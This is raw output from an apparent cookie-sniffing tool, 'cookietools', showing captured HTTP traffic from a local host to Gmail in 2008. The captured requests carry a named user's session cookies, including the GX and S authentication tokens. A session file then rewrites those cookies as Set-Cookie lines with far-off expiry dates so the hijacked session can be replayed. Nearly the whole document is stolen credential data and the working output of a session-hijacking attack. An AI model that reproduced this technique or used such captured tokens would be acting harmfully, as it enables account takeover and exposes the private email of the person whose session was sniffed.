c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'

pktcount=118 time=01/01/2008#13:22:54.346914 src=192.168.1.2:54205 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Encoding: gzip
h Content-Length: 124
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:54 GMT

pktcount=123 time=01/01/2008#13:22:54.684668 src=192.168.1.2:54205 dst=72.14.221.19:80
s POST /mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&VER=2&SID=DD824965CD4E2C0E&RID=13353&zx=siwuxhht784h&it=4417 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: keep-alive
h Content-Type: application/x-www-form-urlencoded
h Referer: http://mail.google.com/mail/?ui=1&view=page&name=js&ver=1mys3lzt1f6w0
h Content-Length: 92
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'

pktcount=128 time=01/01/2008#13:22:54.746013 src=192.168.1.2:54208 dst=72.14.221.19:80
s GET /mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&RID=rpc&SID=DD824965CD4E2C0E&CI=0&AID=3&TYPE=xmlhttp&zx=3dtklszb0p3c&it=4413 HTTP/1.1
h Host: mail.google.com
h User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.8-1)
h Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
h Accept-Language: en-us,en;q=0.5
h Accept-Encoding: gzip,deflate
h Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
h Keep-Alive: 300
h Connection: close
h Referer: http://mail.google.com/mail/?ui=1&view=page&name=js&ver=1mys3lzt1f6w0
c0 type=Cookie
c0 name='__utmx' value='173272373.'
c0 name='__utmz' value='173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral'
c0 name='__utma' value='173272373.895254698.1196439681.1198340013.1199189248.10'
c0 name='__utmb' value='173272373'
c0 name='__utmc' value='173272373'
c0 name='gmailchat' value='charlieroot69@gmail.com/249934'
c0 name='S' value='adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ'
c0 name='GX' value='DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ'
c0 name='GMAIL_LOGIN' value='1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false'
c0 name='GMAIL_SU' value='1'

pktcount=139 time=01/01/2008#13:22:55.67282 src=192.168.1.2:54208 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/plain; charset=utf-8
h ETag: 
h Transfer-Encoding: chunked
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:55 GMT
h Connection: Close

pktcount=143 time=01/01/2008#13:22:55.247734 src=192.168.1.2:54205 dst=72.14.221.19:80
s HTTP/1.1 200 OK
h Cache-control: no-cache
h Pragma: no-cache
h Content-Type: text/html; charset=UTF-8
h ETag: 
h Content-Encoding: gzip
h Content-Length: 26
h Server: GFE/1.3
h Date: Tue, 01 Jan 2008 12:22:55 GMT

xenion@gollum:~/dev/cookietools-0.4$ cat logz/192.168.1.2-72.14.221.19.session
1199190165.62716 Link: http://mail.google.com/mail/
1199190165.62716 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: GMAIL_LOGIN=1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: GMAIL_SU=1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: GMAIL_STAT=lt=349&js=178&dw=220&ct=0&tot=2341&fv=1&id=964f0dea9a&v=tl&st=59&dbe=0&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: MPRF=H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.62716 Set-Cookie: rememberme=true; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190165.417327 Set-Cookie: GMAIL_RTT=EXPIRED; expires=Mon, 31-Dec-07 12:22:45 GMT; path=/mail; domain=.google.com;
1199190165.417327 Set-Cookie: GMAIL_STAT=EXPIRED; expires=Mon, 31-Dec-07 12:22:45 GMT; path=/mail;
1199190165.417327 Set-Cookie: GMAIL_LOGIN=EXPIRED; expires=Mon, 31-Dec-07 12:22:45 GMT; path=/mail; domain=.google.com;
1199190168.77440 Link: http://mail.google.com/mail/?ui=1&ik=&search=inbox&view=tl&start=0&init=1&zx=9plajc7d6rg
1199190168.77440 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: GMAIL_LOGIN=1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: GMAIL_SU=1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: GBE=bf-i; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: MPRF=H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.77440 Set-Cookie: rememberme=true; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.482154 Set-Cookie: GBE=EXPIRED; expires=Mon, 31-Dec-07 12:22:48 GMT; path=/mail;
1199190168.482154 Set-Cookie: GMAIL_RTT=EXPIRED; expires=Mon, 31-Dec-07 12:22:48 GMT; path=/mail; domain=.google.com;
1199190168.482154 Set-Cookie: GMAIL_LOGIN=EXPIRED; expires=Mon, 31-Dec-07 12:22:48 GMT; path=/mail; domain=.google.com;
1199190168.482154 Set-Cookie: GMAIL_SU=EXPIRED; expires=Mon, 31-Dec-07 12:22:48 GMT; path=/mail;
1199190168.529655 Link: http://mail.google.com/mail/channel/test?at=xn3j2v99py493ewyy79lojwafijvez&MODE=init&zx=tq882kz7xgn1&it=2382
1199190168.529655 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: GMAIL_LOGIN=1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: GMAIL_SU=1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.529655 Set-Cookie: MPRF=H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Link: http://mail.google.com/mail/?ui=1&view=cbj&zx=5t98v1rwy7ch
1199190168.702307 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: GMAIL_LOGIN=1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: GMAIL_SU=1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: MPRF=H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190168.702307 Set-Cookie: rememberme=true; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.172142 Set-Cookie: GMAIL_RTT=EXPIRED; expires=Mon, 31-Dec-07 12:22:49 GMT; path=/mail; domain=.google.com;
1199190169.172142 Set-Cookie: GMAIL_LOGIN=EXPIRED; expires=Mon, 31-Dec-07 12:22:49 GMT; path=/mail; domain=.google.com;
1199190169.673923 Link: http://mail.google.com/mail/im/dropupdown.gif
1199190169.673923 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: GMAIL_LOGIN=1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: GMAIL_SU=1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: GMAIL_STAT=lt=426&js=170&dw=228&ct=0&tot=2029&fv=1&id=caed9113f5&v=tl&st=56&dbe=0&; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: MPRF=H4sIAAAAAAAAAKv4MP3M6ddKAPfg1P0HAAAA; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190169.673923 Set-Cookie: rememberme=true; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Link: http://mail.google.com/mail/channel/test?at=xn3j2v99py493ewyy79lojwafijvez&at=xn3j2v99py493ewyy79lojwafijvez&TYPE=xmlhttp&zx=28vid2kb03y6&it=1014
1199190171.468390 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: GMAIL_LOGIN=1199189246648/1199189246648/1199189256174/1199189261653/1199189262023/1199189263522/1199189264736/false/false; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190171.468390 Set-Cookie: GMAIL_SU=1; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Link: http://mail.google.com/mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&VER=4&RID=13352&CVER=2&zx=kknfxdxr9o2a&it=3536
1199190173.803908 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190173.803908 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Link: http://mail.google.com/mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&VER=2&SID=DD824965CD4E2C0E&RID=13353&zx=siwuxhht784h&it=4417
1199190174.684668 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.684668 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Link: http://mail.google.com/mail/channel/bind?at=xn3j2v99py493ewyy79lojwafijvez&RID=rpc&SID=DD824965CD4E2C0E&CI=0&AID=3&TYPE=xmlhttp&zx=3dtklszb0p3c&it=4413
1199190174.746013 Set-Cookie: __utmx=173272373.; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: __utmz=173272373.1199189248.10.5.utmccn=(referral)|utmcsr=google.it|utmcct=/accounts/Logout2|utmcmd=referral; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: __utma=173272373.895254698.1196439681.1198340013.1199189248.10; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: __utmb=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: __utmc=173272373; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: gmailchat=charlieroot69@gmail.com/249934; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: S=adsense=cdZeXaMmlDE:gmail=qvsQTZ_0yo3sdj2r4LHUEw:gmail_yj=vrFkf8h2WzgFF1qHH4RVAA:gmproxy=BdyLzT9CI7A:gmproxy_yj=IZV61rwNwN8:gmproxy_yj_sub=LgzbWBuQoQQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
1199190174.746013 Set-Cookie: GX=DQAAAIQAAACs2kk8gCs_wzAa2rela4ZB7kF-_e_3Z2ayj-1lVbVpsdTcy6JwvvtVKtXwU9ogHc8D4Y2m0HU3Nuh-swB6-39MvdPZTQ_cIKfb1HD8-87lBmg7Hg7YbG3ehpHyVA0mQidIQ24p5Io55n665HJDjyU8UleKUNNrS6AQsLONhFgRDKPM0XJv9qa0uk4btDnwrxQ; expires=Tuesday, 2-Feb-2020 02:02:02 GMT; path=/; domain=google.com;
